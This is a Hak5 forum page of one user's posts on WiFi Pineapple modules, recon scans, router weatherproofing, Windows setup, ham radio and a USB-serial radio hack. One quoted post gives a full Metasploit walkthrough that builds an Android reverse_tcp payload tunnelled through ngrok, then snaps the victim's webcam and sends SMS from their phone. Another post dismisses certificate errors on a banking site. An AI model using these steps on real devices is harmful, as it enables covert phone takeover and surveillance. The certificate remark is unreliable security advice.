Forkish
-
Posts
421 -
Joined
-
Days Won
18
Posts posted by Forkish
-
-
Would a module that gives you a little hovering bubble (think terrible 'chat with us now! ads) of selected information shown be possible with the UI’s abilities?
Would it be difficult to show information/status about the pineapple? Examples could be your network status and SSIDs showing. Or your current public IP and number of clients and their MAC. Is it possible?
-
2 hours ago, Just_a_User said:
Oh man I have about 33% of my seen MAC's blue at my home location. Including some AP's that also have similar ISP names but with black MAC's I guess ISP's are at it as well... or I have neighbours that know more than they let on 😄
So if the pineapple is stationary would this indicate either AP's turned off, mobile AP's or very edge of reception range that comes and goes, maybe with interfearance, moving obsructions etc. Any others?
Could it also be the APs setting to send out beacons at a very low rate?
-
Two questions for the knowledged:
After a recon scan, in the results, why are some of the SSID & BSSID rows blue while others are black?
And the Out of Range Clients, Are they connected Clients and APs that I can reach with my equiptment but their equiptment but they can’t reach me with theirs?
-
On 11/6/2018 at 9:46 AM, Zajt said:
I am thinking of making some module with something for a large project in school, and wonder about what is missing today with the modules available. Anything have some thoughts that would be cool to make? Maybe some detection of some attack or something similar?
A module that let’s you back up your pineapple and/or upload saved backups.
As well a module that allows you issue custom commands would be nice. It’d make issueing CLI commands when mobile easier. Someone started working one but it never came to fruition. Look back a page or two here and you’ll see it.
-
1
-
-
attwifi and FREEWIFI are the only open networks I’ll connect to. Sometimes my bank webpage shows a cert error but that’s usually hobblety-gook.
-
1
-
-
I for some reason did not get the text message.
I was traveling that day but I assume that if it was sent while my phone was in airplane mode, it would been pushed through when my radios were turned off.
While I do have Amber Alerts turned off, I do have government warning turned on.
If I had been more thoughful, I should have looked into my DNS log to see if Adblock blocked it.
-
On 10/14/2018 at 5:03 AM, acid klown said:
Hi Benny!
^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!
I am interested in the same topic, and spent a lot of time this week making it all real.
Here is a summary of what I did to pwn my Android phone via my other Android phone:
1) Download Termux on Google play store.
2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh
3) git clone https://github.com/rapid7/metasploit-framework
4) CD metasploit-framework
5) bundle install (takes about 5 minutes)
6) Go to
https://dashboard.ngrok.com/user/signup
And register a port forwarding free.
7) git clone https://github.com/inconshreveable/ngrok
8)CD ngrok
9)./ngrok tokenauth (your ngrok token) one time dealio
10) ping o.tcp.ngrok.io (get the ngrok IP address)
11) ./ngrok tcp 4564
12)open new windows session
Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework.
13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk
This creates payliad on Root directory in Android phone.
14) ./msfconsole
15) msf> use exploit /multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set lport 4564
msf> exploit -j -z
16) run lolz.apk payload on other phone.
Ngrok waiting for session. Mad waiting for session.
Bvoila! Once it connects,
Type sessions -i 1 and see meterpreter.
Type help for commands.
Type command -h for help with a command.
webcam_snap -i 2 -p /sdcard/selfy.jpg
send_sms -d 2149711234 -t "what's up Darren :)"
commands here
https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699
You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article:
Manz, your good to pwn.
I also recommend,
Git clone https:///github.com/RajkumrdusadTool-X
200 kali tools for termux!!
I love this pr09.
Please note: Ngrok port randomly changes, so your payload must co-align.
I haven't used evil Droid so maybe you know. ?
- คςเ๔ кɭ๏ฬภ
A+
-
look up videos of people that ‘weatherize’ their drones. It can give you an idea of how and what to coat and cover.
-
Dismantle everything with circuitry; wrap in foil; put in giant box wrapped in foil, as far away from you as possible; keep an eye under your car; buy new phones with cash, no name attached; Never use a USB stick on two different systems or after 7 days; SD cards with physical locking levers are your friend; so are friends with CD burners; walmart and office-depot computers/laptops with cash; before setup, remove BLE/WIFI chips; startup them up away from home (library, mall, panera bread); return within two weeks for refund; make sure to change out vehicle headunit; anything with UsB ports; move if possible; cancel internet if possible; all those parts in foil, liquidate it all; start a new hobby like photography; wait 2-6 months; rebuild your life with a smarter perspective.
..This too shall pass..
-
On 9/7/2018 at 11:56 PM, Turion said:
Any idea what all these shell companies are for?
my guess would be to compartmentalize personal information for diversified cash flows.
-
1
-
-
If you’re an auditory learner, the latest podcast Security Now with Steve Gibson is about this.
-
7 hours ago, barry99705 said:
There are several apps that can use kismet data for heatmaps. Though it's much easier to just use an android device and one of the wireless heat mapping apps for it.
do you have a favorite android app for this? I’m an iphone user but I recently picked up a nexus5 for the minor but convenient options such as this.
-
8 hours ago, Exmix said:
It's been so long since i've had to enable/disable windows features I forget what I had done, so I can't help in that aspect, sorry.
As far as Malwarebyes, I will back that up and say it is a good addition to have with Windows Defender. Also another good small piece of software from malwarebytes is their AdwCleaner.
As far as making linux distro startup USBs - Software I use and like is called Yumi. I like it because it lets me use one USB for multiple distros. I use mine for Kali, Ubuntu, Tails, Gparted, Clonezilla, etc. There is another I used in the past that i've heard is still good for various reasons is called Rufus.
Awesome, I’ll check out Yumi. I’ll probably grab rufus as well just to complicate things.
-
Last time I had a windows machine, I was rocking windows 8.1. If course I’ve used them intermittently and turned off telemtry as they’ll allow; only connects to a subnetted travel router which is VPNed and is dns adblocking; fully updated and segregating a few unprivileged users according to use. I ran accross Tronscript which seems to be a series of batch files to automate tedious bloatware removal and the like. It seems promising. I also enabled the Linux subsystem, which leads me to a bigger question.
Any heavy suggestions towards enabling or disabling of some system features? Also do I need to enable Hypervisor to use virtual machines?
I’ve heard malwarebytes is a good addition to windows defender.
In the next day or two I’d like to create a few linux distro startup USB sticks, which program is often preferred for that?
I’ll add anything else I can think of when it comes.
-
thanks for all the replies. I’m going to douse a gl-inet travel router in some corrosion X and let it pump out lone ssids for a few weeks and see what happens. I’ll probably go with barry99705‘s suggestion and go all nude with it. the 1900’s case is easy to remove so I’ll keep an eye on corrosion buildup
-
I may have a large 3’ decorative cube cabinet thing I could out it in. but it’s not even close to airtight. I’ll do my best to minimize it’s over exposure but treating the circutboards and whatnot as an additional step.
-
I’ve got an extra WRT1900 that I want to use as a main AP. The layout of the house is dookie for wifi. Ultimately the preferred placement for us is outside, centrally placed under a well covered breezeway. I live in a very florida-esque environment and I’ve seen corrosion slowly seep into outdoor electronics. I want to mitigate this if possible.
I’ve seen posts/videos of people using spray like Corrosion-X and Corrosion Block on the electronics of their drones. I love Corrosion-X but I’ve yet to open an old router and and doused the innards to see what happens.
Does any one have any knowledge or experiences with treating electronics for outdoor use they’d be willing to share?
-
Yup, I believe it was a response to good portable computers for wardriving. it was white and probably not seen on reddit. The poster mention it had ulta low light capabilities like use with night vision goggles.
Any one remember seeing this that might be able to help me find out more information on the make/model?
-
I don’t want to thread jack but I’m throwing this stuff in here because it seems to be a bustling thread with knowledgable people..
In the back of my mind, I’ve always wanted to get into short band radio stuff. Shit hits the fan kind of mentality. One of the networking apps I use is by a guy named Marcus Roskosch and he makes a bunch of really in depth Ham radio and electronic diagnostic/information type apps. Where’s a good place to start?
Not spam but check out some of his stuff. maybe some one might find it useful:
http://roskosch.de/marcus-roskosch/
HAM Radio Technician Exam preparation by Marcus Roskosch
HAM Radio Technician Exam preparation by Marcus Roskosch
HAM Radio Extra Exam preparation - FCC - ARRL by Marcus Roskosch
HAM Radio General Exam preparation - FCC - ARRL by Marcus Roskosch
RF-Toolbox Pro by Marcus Roskosch
Electronic Toolbox Pro by Marcus Roskosch
-
awesome
9 hours ago, Dave-ee Jones said:When people say "5 GHz" they mean everything in the range of 5.1 -> 5.8 (specifically, for the US it's 5170-5835) for WLAN. That's why it's unspecified and rounded to 5 GHz.
Most drones (and some RC cars) use 5.8 GHz, or 2.4 GHz. I assume it's for the range.We specify 2.4 GHz because it's only the 2400 MHz range that we use for WLAN.
Not sure what they are exactly for Australia.
that makes sense. thanks for the clarification.
-
I’ve always known wifi to be 2.4 & 5ghz. it is really 5.8ghz used with drones or is wifi 5ghz and drones are 5.8ghz?
if the same, wouldn’t a yagi and deauth be very similar to jamming?
This much jam talk makes me want to watch Always Sunny in Philadelphia.
Cat in the wall ‘eh?!
-
AES = Always Exxtra Secure
-
On 4/7/2018 at 2:08 PM, i8igmac said:
Yes meterpreter is installed on my phone.
Which phone do think is most excellent for this extremely gnarly know how?
Bill and Ted was on tonight. I can’t get this voice out of my head.
-
this is where you could sell that second book though.
YOUR USB SERIAL ADAPTER JUST BECAME A SDR
in Hacks & Mods
Posted
YOUR USB SERIAL ADAPTER JUST BECAME A SDR
Content:
To say that the RTL-SDR project was revolutionary might be something of an understatement. Taking a cheap little USB gadget and using it as a Software Defined Radio (SDR) to explore the radio spectrum from the tens of megahertz all the way into gigahertz frequencies with the addition of nothing more than some open source tools may go down as one of the greatest hacks of the decade. But even in the era of RTL-SDR, what [Ted Yapo] has manged to pull off is still pretty incredible.
With a Python script, a length of wire attached to the TX pin, and a mastery of the electron that we mere mortals can only hope to achieve, [Ted] has demonstrated using a common USB to serial adapter as an SDR transmitter. That’s right, using the cheap little UART adapter you’ve almost certainly got sitting in your parts bin right now and his software, you can transmit in the low megahertz frequencies and even up into VHF with some trickery. The project is still very much experimental, and though this may be the first time, we’re willing to bet this isn’t the last time you’ll be hearing about it.
The basic idea is that when sending certain characters over the UART serial line, they can combine with the start and stop bits to produce a square wave burst at half the baud rate. [Ted] found that sending a string of 0x55 at 19200 baud would generate a continuous square wave at 9600 Hz, and if he turned the baud rate all the way up to 2,000,000 where these USB adapters top out, that signal was transmitted at 1 MHz, right in the middle of the AM dial.
A neat trick to be sure, but alone not terribly useful. The next step was to modulate that signal by sending different characters over UART. [Ted] explains at great length his experiments with multi-level quantization and delta-sigma schemes, and each step of the way shows the improvement of the transmitted audio signal. Ultimately he comes up with a modulation scheme that produces a impressively clean signal, all things considered.
This alone is impressive, but [Ted] isn’t done yet. He realized that this method of transmission was generating some strong frequency harmonics which extended far beyond the theoretical maximum 1 MHz frequency of his UART SDR. In his experimentation he found he was able to pick up a signal from all the way out to 151 MHz, though it was too poor to be of any practical use. Dialing back the expectations a bit, he was able to successfully control a cheap 27 MHz RC toy using the 43rd harmonic of a 631 kHz signal at a range of about 10 feet with a FT232RL adapter, which he notes produces the cleanest signals in his testing.
[Ted] is still working on making transmissions cleaner and stronger by adding filters and amplifiers, but these early accomplishments are already very promising. His work reminds us of a low frequency version of the USB to VGA adapter turned GHz SDR transmitter, and we’re very eager to see where it goes from here.